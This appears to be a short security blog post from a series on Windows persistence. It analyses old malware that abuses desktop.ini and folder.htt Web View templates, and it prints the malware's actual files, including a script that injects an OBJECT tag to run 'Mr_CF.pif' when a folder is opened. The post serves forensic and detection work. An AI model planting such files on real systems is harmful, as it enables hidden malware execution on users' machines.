Beyond good ol’ Run key, Part 49
November 5, 2016 in Autostart (Persistence), Compromise Detection, Forensic Analysis, Incident Response, Malware Analysis
I was reviewing the logs of my sandbox and came across a very old malware that was using an old-school trick as a way to increase its chances of survival – it used the desktop.ini / folder.htt combo that comes to play when the Web View is chosen for folders (XP or earlier). I know, I know.. it’s archaeology… but I checked my old posts in this series and realized I have not covered it yet, so I am fixing it now…
An example Desktop.ini created by the malware looks like this:
[.ShellClassInfo] ConfirmFileOp=0 [{5984FFE0-28D4-11CF-AE66-08002B2E1262}] PersistMoniker=file://Folder.htt [ExtShellFolderViews] {5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}
and the associated folder.htt like this:
<html> <head> <meta http-equiv="content-type"content="text/html; charset=Windows-1252"> </head> <body style="margin: 0" scroll=no> <object id=FileList border=0 tabindex=1 classid= "clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" style="width: 100; height: 100" tabIndex=-1> </object> </body> </html> <script> objectstr="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\"" objectstr+="CODEBASE=\"Mr_CF.pif#version=1,1,1,1\">" objectstr+="<PARAM NAME=\"_Version\" VALUE=\"65536\">" objectstr+="</OBJECT>" objectstr+="<HTML><H1></H1></HTML>"; document.writeln(objectstr); document.close(); </script>
There is not much more I can write here… this is super old-school and I am just adding it for completeness.
Comments are closed.